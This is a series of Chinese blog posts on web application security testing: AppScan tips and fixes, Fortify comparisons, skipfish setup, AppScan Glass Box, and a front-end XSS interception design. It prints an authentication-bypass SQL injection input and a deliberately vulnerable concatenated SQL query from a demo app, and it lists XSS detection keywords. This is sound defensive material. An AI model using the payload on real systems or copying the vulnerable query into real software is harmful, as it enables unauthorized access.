　　2.如果开发团队针对一个特定的漏洞进行了修复,不必要再次扫描整个应用程序,来进行重新测试该问题.只需要点击URL,选择"Retest the Issues Found",如果有发现新的问题，会自动添加到扫描结果中.

　　3.CVSS设置可以调整特定漏洞的严重性,想改变漏洞严重性，右键单击一个漏洞,Severity-->CVSS settings.

　　4.工具菜单中的"Manual Test(手动测试)"选项可以帮助进行手动发送攻击请求,而且可以保存当前扫描下的结果，编辑请求,发送后，点击"Save"保存当前的扫描测试.

　　5.Appscan扫描过程中会有很多测试，扫描结果中只显示发现的漏洞的测试,如果需要显示所有的测试(包括非脆弱的结果),需要选择Scan Configuration(扫描配置)-->Test 下的"Save Non-vulnerable Test Variant Information"选项.完成扫描之后可以在View-->Non-vulnerable Variants下查看到.

　　6.如果想扫描一个特定的URL或一个应用程序的特定部分,可以先针对整个应用程序进行探测而不进行测试.选择扫描配置向导下的"Start with Automatic Explore Only"选项.然后输入要扫描的网址,进行扫描.

　　7.当需要扫描一个正在使用的网站,有可能会导致服务瘫痪,需要确保开发团队有意识到这个后果.

　　8.Test Malware(恶意软件测试):这个会分析网站中的恶意的链接.可以选择Scan-->Test For Malware，如果有任何发现，也会被添加扫扫描结果中.

　　Generating Reports(生成报告)

　　在分析结束之后可以针对所有确定的结果进行生成报告.其中包括为了解决改问题需要遵循的补救措施的报告.报告是可以根据需求进行定制的,例如可以为不同的开发团队设置不同的模板.比如针对公司标志，封面页，报告标题等进行不同的定制。

　　在上图中，可以看到所有可选的参数.

　　Tools(工具)

　　本节介绍Tools中的Power Tools，该工具是为了更好的对结果进行分析.

　　Authentication Tester(认证测试)

　　帮助执行针对应用程序用户名和密码进行暴力猜解，结果取决于密码策略字典强大与否.

　　Connection Test(连接测试)

　　可以用来ping一个网站,仅此而已.

　　Encode/Decode(编码/解码)

　　分析扫描结果的同时，可能会遇到许多的地方需要进行编码和解码.

　　HTTP Request Editor(Http请求编辑器)

　　可以修改请求的值来测试应用程序针对请求返回的不同响应.

　　这篇文章是Rational Appscan使用中的一部分内容,重要的是牢记,工具值提供结(在某些情况下甚至都可能不提供你所有的结果),从安全分析师的观点，提升个人技术技能才是最重要的，从而可以判断发现的是否是误报还是真正存在漏洞.

顺其自然EVO 2014-09-19 09:56 发表评论

应用安全测试：双面的黑盒

顺其自然EVO — Fri, 19 Sep 2014 01:54:00 GMT

　软件安全的最大风险是检验工具及过程不透明的本质，以及不同的检验技术（例如自动化动态测试）不能覆盖假阴性错误的潜在可能性。

　　尽管安全软件开发生命周期(SDLC)有很多相关的最佳实践，但大多数组织依然有一种倾向，那就是主要依赖测试去构建安全的软件。当前的测试方法有一个最严重的副作用，即组织不太清楚哪些已经被其解决方案测试过，而（甚至更重要的是）还有哪些未被测试过。我们的研究表明，任何单一的自动化保证机制最多可以检验44%的安全需求。NIST 静态分析工具博览会发现，Tomcat中有26个已知的漏洞，但所有静态分析工具综合起来只报告了其中4个警告。因为依赖不透明的检验过程是一种普遍存在的习惯，甚至已经成为行业标准，因此许多组织在构建安全的软件时，满足于把测试作为最主要的手段。

　　举个例子，假设你雇用一家咨询公司为你的软件执行渗透测试。许多人将这种测试称为“黑盒”（基于同名的质保技术），测试人员没有详细的系统内部构件知识（比如系统代码）。执行测试之后，一成不变地生成一份报告，概括你应用中的几类漏洞。你修复了漏洞，然后提交应用做回归测试，下一份报告反馈说“已清除”——也就是说没有任何漏洞了。或者充其量仅仅告知你，你的应用在同一时间范围内不会被同样的测试人员以同样的方式攻破。但另一方面，它不会告诉你：

　　你的应用中还有哪些潜在的威胁？

　　你的应用中哪些威胁“其实不易受到攻击”？

　　你的应用中有哪些威胁未被测试人员评估？从运行期的角度来看，哪些威胁无法测试？

　　测试的时间及其他约束如何影响了结果的可靠性？例如，如果测试人员还有5天时间，他们还将执行哪些其他的安全测试？

　　测试人员的技能水平有多高？你能否从不同的测试人员或者另一家咨询公司手中取得一组相同的结果？

　　以我们的经验来看，组织无法回答以上大多数问题。黑盒是两面的：一方面，测试人员不清楚应用的内部结构；而另一方面，申请测试的组织对自己软件的安全状况也缺乏了解。并不只是我们意识到了这个问题：Haroon Meer在44con上讨论了渗透测试的挑战。这些问题大多数都适用于任何形式的验证：自动化动态测试、自动化静态测试、手工渗透测试以及手工代码审查。实际上，近期有一篇论文介绍了源代码审查中类似的挑战。

　　关于需求的实例

　　为了更好地说明这个问题，让我们看一些常见的高风险软件的安全需求，以及如何将常见的验证方法应用到这些需求上。

　　需求：使用安全的哈希算法（如SHA-2）和唯一的混淆值（salt value）去哈希（Hash）用户密码。多次迭代该算法。

　　在过去的一年里，LinkedIn、Last FM和Twitter发生了众所周知的密码泄露事件，对于此类缺陷，本条需求是具体地、合乎时宜的。

　　如何应用常见的验证方法：

　　自动化运行期测试：不可能访问已存的密码，因此无法使用此方法验证本需求

　　手工运行期测试：只有另一些开发导致已存密码转储时，才能使用此方法验证本需求。这并不是你所能控制的，因此你不能依靠运行期测试去验证本需求。

　　自动化静态分析：只有满足以下条件时，才可以用此方法验证本需求：

　　工具清楚身份认证是如何工作的（例如，使用了标准的组件，就像Java Realms)

　　工具清楚应用程序使用了哪个特定的哈希算法

　　如果应用程序为每次哈希使用了唯一的混淆值，工具要清楚混淆算法和混淆值

　　实际上，认证有很多实现方法，指望静态分析方法全面地验证本需求是不切实际的。更为实际的方案是，使用工具简单地确认认证程序，并指出必须进行安全的哈希和混淆处理。另一个方案是，你来创建自定义规则，用以鉴定算法和哈希值，确认它们是否符合你专属的策略，尽管，在我们的经验中这种实践极为罕见。

　　手工代码审查：对于本需求，这是最可靠的常见验证方法。手工评估人员能够理解哪一段代码中发生了认证，验证哈希和混淆处理符合最佳实践。

　　需求：在SQL语句中绑定变量以预防SQL注入

　　SQL 注入是最具破坏性的应用漏洞之一。近期发现在Ruby on Rails中有一个缺陷，在其技术栈上搭建的应用系统会受到SQL注入攻击。

　　如何应用常见的验证方法：

　　自动化运行期测试：虽然，运行期测试通过行为分析也许能够发现存在的SQL注入，但是，却不能证明没有SQL注入。因此，自动化运行期测试不能充分地验证本需求

　　手工运行期测试：与自动化运行期测试一样具有相同的局限性

　　自动化静态分析：通常能够验证本需求，特别是当你使用标准类库访问SQL数据库时。你是否将用户输入动态地拼接为SQL语句，还是使用正确地变量绑定，工具应该都可以分辨得出来。然而，这是有风险的，在以下场景中静态分析可能会漏掉SQL注入漏洞：

　　你在数据库上使用存储过程，并且无法扫描数据库代码。在某些情况下，存储过程也易受到SQL注入

　　你使用了一种对象关系映射(ORM)类库，但你的静态分析工具不支持这种类库。对象关系映射也易受到注入。

　　你使用非标准的驱动或类库去连接数据库，并且驱动没有正确地实现常见地安全控制（比如预编译语句）

　　手工代码审查：与静态分析一样，手工代码审查能够确认没有SQL注入漏洞。然而，实际上产品应用中可能有几百或成千上万条SQL语句。手工审查每一条语句不仅非常耗时，而且容易出错。

　　需求：使用授权检查以确保用户无法查看其他用户的数据。

　　我们每年都能听到此类漏洞新的事例。

如何应用常见的验证方法：

　　自动化运行期测试：通过访问两个不同用户数据的方式，使用一个用户的账号尝试访问另一个用户的数据，自动化工具能够在一定程度上完成本需求的测试。然而，这些工具不可能清楚一个用户账号的哪些数据是敏感的，也不了解把参数“data=account1”修改为“data=account2”表示违反了授权。

　　手工运行期测试：通常情况下，手工运行期测试是发现这类漏洞最有效的方法，因为人可以拥有必需的领域知识以探明这类攻击的位置。然而，在有些情况下，运行期测试人员可能无法全面掌握发现这类缺陷所必需的一切信息。例如，如果附加一个类似于“admin=true”的隐藏参数，使你可以不需授权检查就能访问其他用户的数据。

　　自动化静态分析：如果没有规则的定制，自动化工具通常发现不了这种类型的漏洞，因为它需要对领域的理解能力。例如，静态分析工具不清楚“data”参数表示条件信息，需要授权检查。

　　手工代码审查：手工代码审查能够揭露缺失授权的实体（译者注，比如代码），这是使用运行期测试难以发现的，比如添加一个“admin=true”的参数的影响。但是，实际上采用这种方式去验证是否做了授权检查费时费力。一处授权检查可能出现在许多不同部分的代码中，所以手工审查人员可能需要从头到尾追踪数条不同的执行路径，以检测是否做了授权。

　　对你的影响

　　验证的不透明的本质，意味着有效的软件安全需求的管理是必要的。对于已列出的需求，测试人员即可以明确他们已经评估一条具体的需求，也可以明确他们所用到的技术。评论家提出，渗透测试不应该遵循一张“类似于审计的检查表”，因为没有检查表可以覆盖模糊的范围和特定领域的漏洞。但是，要灵活地找到独特的问题，就不可避免地要确定已经充分理解了需求。这种情况与标准的软件质量保证（QA）非常相似：好的质保测试人员即能够验证功能需求，也能够思考盒子的边界，想办法去破坏功能。如果只是简单、盲目地测试，报告一些与功能需求无关的缺陷，就会显著降低质量保证的效用。那么为什么要接受较低标准的安全测试呢？

　　在你执行下一次安全验证活动之前，确保你有软件安全需求可用于衡量，并且你要明确属于验证范围内的需求。如果你雇佣手工渗透测试人员或源代码审查人员，他们就可以相对轻松地确定哪些需求是由他们来测试的。如果你使用某种自动化工具或服务，合作的供应商会表明，哪些需求无法用他们的工具或服务可靠地测试。你的测试人员、产品或服务不可能保证完全没有假阴性错误（例如，保证你的应用中不会受到SQL注入攻击），但同时也要理解，对它们做测试能够大大有助于增加你的自信心，有信心你的系统代码中不包含已知的、可预防的安全漏洞。

顺其自然EVO 2014-09-19 09:54 发表评论

对比AppScan Source和Fortify扫描AltoroJ的结果

顺其自然EVO — Tue, 16 Sep 2014 01:50:00 GMT

1、漏洞总数

　　AppScan Source：91

　　Fortify：121

　　2、Disclaimer.htm:34(Cross-Site Scripting:DOM)的漏洞Fortify能扫描出来，AppScan Source扫描不出来

　　另外，Fortify能扫描出比较多Persistent类型的XSS漏洞

　　并且归类比较好（分DOM、Persistent、Reflected类型列出）

　　3、AdminLoginServlet.java:35(Password Management:Hardcoded Password)的漏洞Fortify能扫描出来，AppScan Source扫描不出来

　　4、Fortify扫出的DBUtil.java:238(Access Control:Database)在AppScan中被归类到SQL Injection

　　5、admin.jsp:18(Password Management:Empty Password)属于误报

　　6、Fortify会报比较多这类问题：

Code Correctness：Class Does Not Implement equals

Hardcoded Domain in HTML

Hidden Field

J2EE Bad Practices

J2EE Misconfiguration

Missing Check against Null

Password Management:Password in Comment

Poor Error Handling

System Information Leak:Incomplete Servlet Error Handling

　　7、Fortify会报比较多transfer.jsp:32(Cross-Site Request Forgery)这类CSRF的问题，而AppScan Source没有扫出来

　　8、Fortify有扫出ServletUtil.java(Missing XML Validation)的问题，而AppScan Source没有扫出来

　　9、Fortify有扫出AdminServlet.java:65(Redundant Null Check)的问题，而AppScan Source没有扫出来

顺其自然EVO 2014-09-16 09:50 发表评论

谷歌web站点安全扫描软件安装、配置和使用

顺其自然EVO — Thu, 21 Aug 2014 01:49:00 GMT

　　一：简介

　　skipfish是什么？

　　Skipfish是一个积极的Web应用程序的安全性侦察工具。它准备了一个互动为目标的网站的站点地图进行一个递归爬网和基于字典的探头。然后，将得到的地图是带注释的与许多活性（但希望非破坏性的）安全检查的输出。最终报告工具生成的是，作为一个专业的网络应用程序安全评估的基础。

　　二：部署安装

　　2.1：部署环境

　　[root@cn-ptmind skipfish-read-only]# uname -a

　　Linux cn-ptmind 2.6.32-220.el6.x86_64 #1 SMP Tue Dec 6 19:48:22 GMT 2011 x86_64 x86_64 x86_64 GNU/Linux

　　[root@cn-ptmind skipfish-read-only]# more /etc/redhat-release

　　CentOS release 6.2 (Final)

　　2.2：安装skipfish依赖包：

　　yum -y install gcc gcc-c++ autoconf libjpeg libjpeg-devel libpng libpng-devel freetype freetype-devel libxml2 libxml2-devel zlib zlib-devel glibc glibc-devel glib2 glib2-devel bzip2 bzip2-devel zip unzip ncurses ncurses-devel curl curl-devel e2fsprogs e2fsprogs-devel krb5-devel libidn libidn-devel openssl openssh openssl-devel nss_ldap openldap openldap-devel openldap-clients openldap-servers libxslt-devel libevent-devel ntp libtool-ltdl bison libtool vim-enhanced python wget lsof iptraf strace lrzsz kernel-devel kernel-headers pam-devel Tcl/Tk cmake ncurses-devel bison setuptool popt-devel rsynx openssh system-config-network-tui svn

　　2.3：下载skipfish

　　svn checkout http://skipfish.googlecode.com/svn/trunk/ skipfish-read-only

　　#进入目录

　　cd skipfish-read-only

　　#执行make 编译，生成skipfish 命令。

　　make

　　三：网站扫面实例

　　./skipfish -o ptengine http://www.ptengine.com

　　# -o 选项制定生成扫描报告文件夹

　　#将报告文件夹进行打包

　　tar -cvf ptengine.tar ptengine

　　#将压缩包下载到本地

　　sz -bey ptengine.tar

　　扫描报告下载到本地PC后并解压，打开文件夹，找到index.html文件，用浏览器打开，即可查看扫描报告。

顺其自然EVO 2014-08-21 09:49 发表评论

Appscan安全漏洞修复

顺其自然EVO — Mon, 18 Aug 2014 02:11:00 GMT

　1.会话标识未更新：登录页面加入以下代码

　　request.getSession(true).invalidate();//清空session

　　Cookie cookie = request.getCookies()[0];//获取cookie

　　cookie.setMaxAge(0);//让cookie过期

　　request.getSession(true).invalidate();//清空session

　　Cookie cookie = request.getCookies()[0];//获取cookie

　　cookie.setMaxAge(0);//让cookie过期

　　不是很明白session的机制，高手路过可以指教一下。

　　2.跨站点请求伪造：

　　在出错的url加参数sessionid。

　　response.getWriter().write( "");

　　如果带参数报ssl错误，使用下面的post方式传值：

response.getWriter().write(

);

response.getWriter().write(

);

　　3.启用不安全HTTP方法

　　修改web工程中或者服务器web.xml,增加安全配置信息，禁用不必要HTTP方法

PUT

DELETE

HEAD

OPTIONS

TRACE

BASIC

　　修改web工程中或者服务器web.xml,增加安全配置信息，禁用不必要HTTP方法

PUT

DELETE

HEAD

OPTIONS

TRACE

BASIC

　　4.已解密登录请求

　　配置SSL，具体见http://serisboy.iteye.com/admin/blogs/1320231

　　在web.xml加入如下配置。

SSL

CONFIDENTIAL

SSL

CONFIDENTIAL

　　5.高速缓存的ssl页面

　　页面

　　response.setHeader("Pragma", "No-cache");

　　6.目录列表

　　配置文件目标拒绝访问。

　　在conf/web.xml下:

default

org.apache.catalina.servlets.DefaultServlet

debug

listings

false

default

org.apache.catalina.servlets.DefaultServlet

debug

listings

false

　　把listings对应的value设置为fasle.

　　或者把上面的这个servlet加到你的虚拟路径下的web-inf/web.xml中,把servlet-name改为其它的,再加一下servlet-mapping

default1

org.apache.catalina.servlets.DefaultServlet

debug

listings

false

default1

org.apache.catalina.servlets.DefaultServlet

debug

listings

false

default1

顺其自然EVO 2014-08-18 10:11 发表评论

IBM Security AppScan Glass Box：一种全新的漏洞扫描思想

顺其自然EVO — Tue, 05 Aug 2014 01:55:00 GMT

　　Glass Box 是 IBM Security AppScan Standard Edition（以下简称 AppScan）8.5 版本以后引进的一个新的组件，是对 AppScan 的一个比较大的改进。Glass Box 引进了运行时分析的技术，通过部署在服务器端的代理，在探索和测试阶段搜集 Web 应用程序信息，并进行分析，进而反馈给 AppScan，使 AppScan 更有针对性的进行探索和扫描，提高了扫描的精确性，并有利于发现更多的漏洞。

　　Glass Box 并不仅仅是 AppScan 的一个新的特性，而是代表了一种全新的思想，将动态分析技术与传统的 AppScan 黑盒测试技术结合起来，对 Web 应用程序进行代码级别的分析，给出更精确的分析结果，从而更有效的帮助客户保护好自己的网站。

　　前言

　　Glass Box 是 IBM Security AppScan Standard Edition（以下简称 AppScan）8.5 版本以后引进的一个新的组件，是对 AppScan 的一个比较大的改进。Glass Box 引进了运行时分析的技术，通过部署在服务器端的代理，在探索和测试阶段搜集 Web 应用程序信息，并进行分析，进而反馈给 AppScan，使 AppScan 更有针对性的进行探索和扫描，提高了扫描的精确性，并有利于发现更多的漏洞。Glass Box 并不仅仅是 AppScan 的一个新的特性，而是代表了一种全新的思想，将动态分析技术与传统的 AppScan 黑盒测试技术结合起来，对 web 应用程序进行代码级别的分析，给出更精确的分析结果，从而更有效的帮助客户保护好自己的网站。

　　本文首先简单介绍了 AppScan Glass Box 的技术架构，然后介绍了在 AppScan 8.5 中 Glass Box 在 Windows XP 下使用效果。Glass Box 支持 WebSphere、Tomcat、JBoss 等多种应用服务器，本文选择的 Web 服务器为大家常见的 Tomcat 7.0。

　　技术架构

　　Glass Box 可分为客户端和服务端。客户端又可分为 GlassAPI 和 Glass Box 引擎服务，GlassAPI 用于和服务器端通信，获取服务端返回的问题信息；Glass Box 引擎服务基于预定义的验证规则，对获取到的服务端进行分析，判断是否存在漏洞。服务端通过代理程序搜集服务器端信息，包括 Web 应用程序运行时信息（根据预定义的特征匹配规则）、源代码信息、配置文件信息、操作系统信息、数据库信息和 Web 服务器信息等，并将搜集到的信息返回给客户端。

　　图 1. Glass Box 技术架构图

　　配置及使用

　　打开扫描配置面板，可对 Glass Box 进行配置。点击 Glass Box 面板中的添加按钮，可添加 Glass Box 代理程序。

　　图 2. Glass Box 代理程序定义

　　代理程序的用户名和密码分别为安装 Glass Box 时设定的用户名和密码，如需要修改密码，可运行 AgentCredentials.bat ，或直接修改位于 GBootStrap\WEB-INF 目录下的 users.xml 文件，重启 Tomcat 后生效。用户可添加多个 Glass Box 代理程序，但 AppScan 同一时间只能使用其中的一个。添加代理程序成功后，可对 Glass Box 进行设置，选中"在探索阶段使用 glass box "，可发现更多的隐藏的 URL；选中"在测试阶段使用 glass box"，可发现更多的漏洞和提供更详细的漏洞信息。配置成功后，AppScan 右下角状态栏将显示"Glass box 扫描：已启用"。

　　Glass Box 配置成功后，需要对 Web 应用程序重新扫描。需要注意的是，由于 Glass Box 对 URL 的解析问题，扫描本地网站需要配置虚拟域名，即起始 URL 不能是“http://localhost/myproject”, 而应该是“http://mysite/myproject”。Glass Box 目前仅支持 Java 项目。本文所选用扫描网站是 IBM AppScan 开发人员提供的 AltoroJ 项目。

　　通过对配置 Glass Box 前后的扫描结果进行分析，我们分析一下使用 Glass Box 的三个优势。为方便起见，本文采用默认的扫描配置（新建一个常规扫描，采用默认的扫描策略，对扫描配置的各项参数不做任何修改），并且没有对结果进行分析，排除误报的漏洞。每次扫描，结果可能会略有不同；若差别太大，则应该检查扫描配置信息，查看日志，找出问题所在。

　　1. 在探索阶段通过检测出代码中不可见的参数和 cookie 信息，探索隐藏的扫描路径，提高扫描覆盖率。

　　在应用程序中，有一些参数并未暴露给用户，即对用户是"不可见"的，传统的 AppScan 运行在客户端，并不能够检测到这些参数，更无法探索到相关的页面。 Glass Box 运行于探索阶段全过程，预定义一些"感兴趣"的方法（如 getParameter、Runtime.getRuntime().exec 等），并时刻检测这些方法是否运行，并进而探索出其中的参数，再根据这个参数构造扫描路径。

　　2. 在测试阶段，Glass Box 可增强 AppScan 在各种漏洞类型方面的检测。

　　Glass Box 通过搜集服务端信息，可减少误报率，增强 AppScan 对各种漏洞类型的检测，主要能够增强 AppScan 对注入攻击、不安全的直接对象引用、安全配置错误和不安全的加密存储等漏洞的检测。通过扫描 AltoroJ 项目可以发现，配置 Glass Box 前，共扫描出了 100 个漏洞；而配置 Glass Box 后，共扫描到了 139 个漏洞；Glass Box 增加了了大约 40% 的漏洞扫描发现数量。下表是按照 OWASP Top 10 漏洞分类方法，对使用 Glass Box 前后的扫描漏洞数量进行的对比。

　　表 1. 使用 Glass Box 前后发现的漏洞数量对比

　　有时候，Web 开发人员会屏蔽错误信息，比如设置一个错误页面，发生异常时直接跳转到该页面，AppScan 无法直接从 response 信息中判断是否存在漏洞。Glass Box 通过预定义的方法，搜集服务器端的信息，从而判断是否存在漏洞。

　　通过扫描我们发现，未使用 Glass Box 前，AppScan 并未检测出用户登录页面的 SQL 注入漏洞（AppScan 可检测出各种类型的漏洞，未检测出该页面的 SQL 注入漏洞属于个别情况）。我们来分析一下原因。

AppScan 在测试阶段，向登陆页面发送请求，我们假定 AppScan 将 Username 和 Password 均设置为"'"，服务器返回错误信息"Syntax error: Encountered "\'" at line 1, column 63. "。由于在 Response 中并未包含 SQL 异常信息，所以 AppScan 无法判断是否存在 SQL 注入漏洞。

　　图 3. 页面显示的错误信息

　　但是如果我们写一个测试代码，可得知当我们输入单引号时，服务器端确实报了 SQL 语法错误信息，如图 4 所示。Glass Box 安装在服务器端，当它发现请求值为 g'[number]b，且包含了单引号的信息请求时，如果出现 SQL 异常错误信息，那么 Glass Box 便判断出该页面存在 SQL 注入漏洞。

　　图 4.SQL 异常信息

　　3. 在生成报告阶段，可提供代码级的调试信息和修复建议

　　我们以 AltoroJ 项目的登陆页面为例，对比一下使用黑盒测试和使用 Glass Box 发现的漏洞的修复过程。AppScan 通过分别在 Username 和 Password 输入框中输入"4ppSc4n"和"A' OR '7659'='7659"，发现了该页面存在 SQL 注入漏洞（AppScan 中称之为"SQL 注入的认证旁路"）。我们根据"请求 / 响应"信息可以发现，该漏洞存在于 doLogin 这个 servlet 中，如图 5 所示。

　　图 5.AppScan “请求 / 响应”

　　我们根据 WEB-IBF/web.xml 中的信息进一步判断出漏洞存在于 LoginServlet.java 文件中。

　　清单 1.web.xml 文件中的 LoginServlet 配置

LoginServlet

/doLogin

LoginServlet

com.ibm.rational.appscan.altoromutual.servlet.LoginServlet

　　打开 LoginServlet.java 文件，我们依然很难一眼就判断出漏洞的准确位置，需要对代码做进一步的分析。经过分析，找到存在漏洞的语句：

　　清单 2. LoginServlet.java 文件中存在漏洞的语句

　　if (!DBUtil.isValidUser(username, password))

　　然后，我们再找到 DBUtil 类中的 isValidUser 函数，最终找到了存在漏洞的 sql 语句：

　　清单 3. 存在漏洞的 SQL 语句

　　ResultSet resultSet = statement.executeQuery("SELECT COUNT(*)FROM PEOPLE WHERE USER_ID

　　= '"+ user +"' AND PASSWORD='" + password + "'");

　　/* BAD - user input should always be sanitized */

　　虽然有时候对于经验丰富的开发者来说，对于逻辑简单程序能够直接定位到某个 java 文件，省去一些步骤，但是大部分情况下，我们都需要一步步的去分析。而对于 Glass Box 发现的漏洞，则可以大大节省开发人员定位代码漏洞的时间。Glass Box 可报告出漏洞的具体位置信息，如方法名、类名、文件名和行号等信息；并可报告运行时信息。如图 6 所示。

　　图 6. Glass Box 问题信息

　　总结

　　黑盒测试技术由于无法获取应用程序的内部信息，导致扫描覆盖率偏低，且无法提供详细的调试信息；而白盒测试技术的代价过于高昂，需要大量的人工成本，且误报率较高。而 Glass Box 是有别于传统黑盒测试和白盒测试的一种混合测试技术，将有效解决这一难题，为客户创造更好的价值。

顺其自然EVO 2014-08-05 09:55 发表评论

XSS 前端防火墙—内联事件拦截

顺其自然EVO — Wed, 09 Jul 2014 08:01:00 GMT

　　关于 XSS 怎样形成、如何注入、能做什么、如何防范，前人已有无数的探讨，这里就不再累述了。本文介绍的则是另一种预防思路。

　　几乎每篇谈论 XSS 的文章，结尾多少都会提到如何防止，然而大多万变不离其宗。要转义什么，要过滤什么，不要忘了什么之类的。尽管都是众所周知的道理，但 XSS 漏洞十几年来几乎从未中断过，不乏一些大网站也时常爆出，小网站更是家常便饭。

　　预警系统

　　事实上，至今仍未有一劳永逸的解决方案，要避免它依旧使用最古老的土办法，逐个的过滤。然而人总有疏忽的时候，每当产品迭代更新时，难免会遗漏一些新字段，导致漏洞被引入。

　　即使圣人千虑也有一失，程序出 BUG 完全可以理解，及时修复就行。但令人费解的是，问题出现到被发现，却要经过相当长的时间。例如不久前贴吧 XSS 蠕虫脚本，直到大规模爆发后经用户举报，最终才得知。其他网站大多也类似，直到白帽子们挖掘出漏洞，提交到安全平台上，最终厂商才被告知。若遇到黑客私下留着这些漏洞慢慢利用，那只能听天由命了。

　　因此，要是能有一套实时的预警系统，那就更好了。即使无法阻止漏洞的发生，但能在漏洞触发的第一时间里，通知开发人员，即可在最短的时间里修复，将损失降到最低。各式各样的应用层防火墙，也由此产生。

　　不过，和传统的系统漏洞不同，XSS 最终是在用户页面中触发的。因此，我们不妨尝试使用前端的思路，进行在线防御。

　　DOM 储存型 XSS

　　先来假设一个有 BUG 的后台，没有很好处理用户输入的数据，导致 XSS 能被注入到页面：

　　只转义尖括号，却忘了引号，是 XSS 里最为常见的。攻击者们可以提前关闭属性，并添加一个极易触发的内联事件，跨站脚本就这样被轻易执行了。

　　那么，我们能否使用前端脚本来捕获，甚至拦截呢？

　　被动扫描

　　最简单的办法，就是把页面里所有元素都扫描一遍，检测那些 on 开头的内联属性，看看是不是存在异常：

　　例如字符数非常多，正常情况下这是很少出现的，但 XSS 为了躲避转义有时会编码的很长；例如出现一些 XSS 经常使用的关键字，但在实际产品里几乎不会用到的。这些都可以作为漏洞出现的征兆，通知给开发人员。

　　不过，土办法终究存在很大的局限性。在如今清一色的 AJAX 时代，页面元素从来都不是固定的。伴随着用户各种交互，新内容随时都可能动态添加进来。即使换成定期扫描一次，XSS 也可能在定时器的间隔中触发，并销毁自己，那样永远都无法跟踪到了。况且，频繁的扫描对性能影响也是巨大的。

　　如同早期的安全软件一样，每隔几秒扫描一次注册表启动项，不仅费性能，而且对恶意软件几乎不起作用；但之后的主动防御系统就不同了，只有在真正调用 API 时才进行分析，不通过则直接拦截，完全避免了定时器的间隔遗漏。

　　因此，我们需要这种类似的延时策略 —— 仅在 XSS 即将触发时对其分析，对不符合策略的元素，进行拦截或者放行，同时发送报警到后台日志。

　　主动防御

　　『主动防御』，这概念放在前端脚本里似乎有些玄乎。但不难发现，这仅仅是执行优先级的事而已 —— 只要防御程序能运行在其他程序之前，我们就有了可进可退的主动权。对于无比强大的 HTML5 和灵活多变的 JavaScript，这些概念都可以被玩转出来。

　　继续回到刚才讨论的内联事件 XSS 上来。浏览器虽然没提供可操控内联事件的接口，但内联事件的本质仍是一个事件，无论怎样变化都离不开 DOM 事件模型。

　　扯到模型上面，一切即将迎刃而解。模型是解决问题的最靠谱的办法，尤其是像 DOM-3-Event 这种早已制定的模型，其稳定性毋庸置疑。

　　即便没仔细阅读官方文档，但凡做过网页的都知道，有个 addEventListener 的接口，并取代了曾经一个古老的叫 attachEvent 的东西。尽管只是新增了一个参数而已，但正是这个差别成了人们津津乐道的话题。每当面试谈到事件时，总少不了考察下这个新参数的用途。尽管在日常开发中很少用到它。

　　关于事件捕获和冒泡的细节，就不多讨论了。下面的这段代码，或许能激发你对『主动防御』的遐想。

Run

　尽管按钮上直接绑了一个内联的事件，但事件模型并不买账，仍然得按标准的流程走一遍。capture，target，bubble，模型就是那样固执。

　　不过，把那行注释的代码恢复，结果就只剩 capture 了。这个简单的道理大家都明白，也没什么好解释的。

　　但仔细揣摩下，这不就是『主动防御』的概念吗？捕获程序运行在内联事件触发之前，并且完全有能力拦截之后的调用。

　　上面的 Demo 只是不假思索拦截了所有的事件。如果我们再加一些策略判断，或许就更明朗了：

Run

　　我们先在捕获阶段扫描内联事件字符，若是出现了『xss』这个关键字，后续的事件就被拦截了；换成其他字符，仍然继续执行。同理，我们还可以判断字符长度是否过多，以及更详细的黑白名单正则。

　　怎么样，一个主动防御的原型诞生了吧。

　　不过，上面的片段还有个小问题，就是把事件的冒泡过程也给屏蔽了，而我们仅仅想拦截内联事件而已。解决办法也很简单，把 e.stopImmediatePropagation() 换成 element.onclick = null 就可以了。

　　当然，目前这只能防护 onclick，而现实中有太多的内联事件。鼠标、键盘、触屏、网络状态等等，不同浏览器支持的事件也不一样，甚至还有私有事件，难道都要事先逐一列出并且都捕获吗？是的，可以都捕获，但不必事先都列出来。

　　因为我们监听的是 document 对象，浏览器所有内联事件都对应着 document.onxxx 的属性，因此只需运行时遍历一下 document 对象，即可获得所有的事件名。

Run

　　现在，无论页面中哪个元素触发哪个内联事件，都能预先被我们捕获，并根据策略可进可退了。

　性能优化

　　或许有些事件没有必要捕获，例如视频播放、音量调节等，但就算全都捕捉也耗不了多少时间，基本都在 1ms 左右。

　　当然，注册事件本来就花不了多少时间，真正的耗费都算在回调上了。尽管大多数事件触发都不频繁，额外的扫描可以忽律不计。但和鼠标移动相关的事件那就不容忽视了，因此得考虑性能优化。

　　显然，内联事件代码在运行过程中几乎不可能发生变化。使用内联事件大多为了简单，如果还要在运行时 setAttribute 去改变内联代码，完全就是不可理喻的。因此，我们只需对某个元素的特定事件，扫描一次就可以了。之后根据标志，即可直接跳过。

Run

　　这样，之后的扫描仅仅是判断一下目标对象中的标记而已。即使疯狂晃动鼠标，CPU 使用率也都忽略不计了。

　　到此，在 XSS 内联事件这块，我们已实现主动防御。

　　对于有着大量字符，或者出现类似 String.fromCharCode，$.getScript 这类典型 XSS 代码的，完全可以将其拦截；发现有 alert(/xss/)，alert(123) 这些测试代码，可以暂时放行，并将日志发送到后台，确定是否能够复现。

　　如果复现，说明已有人发现 XSS 并成功注入了，但还没大规模开始利用。程序猿们赶紧第一时间修 BUG 吧，让黑客忙活一阵子后发现漏洞已经修复了：）

　　字符策略的缺陷

　　但是，光靠代码字符串来判断，还是会有疏漏的。尤其是黑客们知道有这么个玩意存在，会更加小心了。把代码转义用以躲避关键字，并将字符存储在其他地方，以躲过长度检测，即可完全绕过我们的监控了：

　　因此，我们不仅需要分析关键字。在回调执行时，还需监控 eval、setTimeout('...') 等这类能解析代码的函数被调用。

　　不过，通常不会注入太多的代码，而是直接引入一个外部脚本，既简单又靠谱，并且能实时修改攻击内容：

顺其自然EVO 2014-07-09 16:01 发表评论

浅淡常见的WEB安全漏洞测试及验证

顺其自然EVO — Wed, 09 Jul 2014 07:53:00 GMT

【文件上传漏洞】

　　1.对用户上传的文件没有进行充分合理的验证，导致被上传木马等恶意文件并执行

　　验证方式可能有：客户端JS检测、服务器MIME类型检测、服务器目录路径检测、服务器文件扩展名检测、服务器文件内容检测。

　　常见的方式：服务器充分验证文件类型及文件内容、服务器端重命名

　　其他限制：服务器端上传目录设置不可执行权限

　　【CSS漏洞】

　　例如input输入框这种类型的测试：

　　http:/host/xss/example1.php?name = song

　　测试的时候也可以直接简单点，输入简单的这些实体字符（例如：<>（）"），然后查看前台的源代码是否做转义，如果没有那么自己可以输入任何的脚本都是有可能执行的。

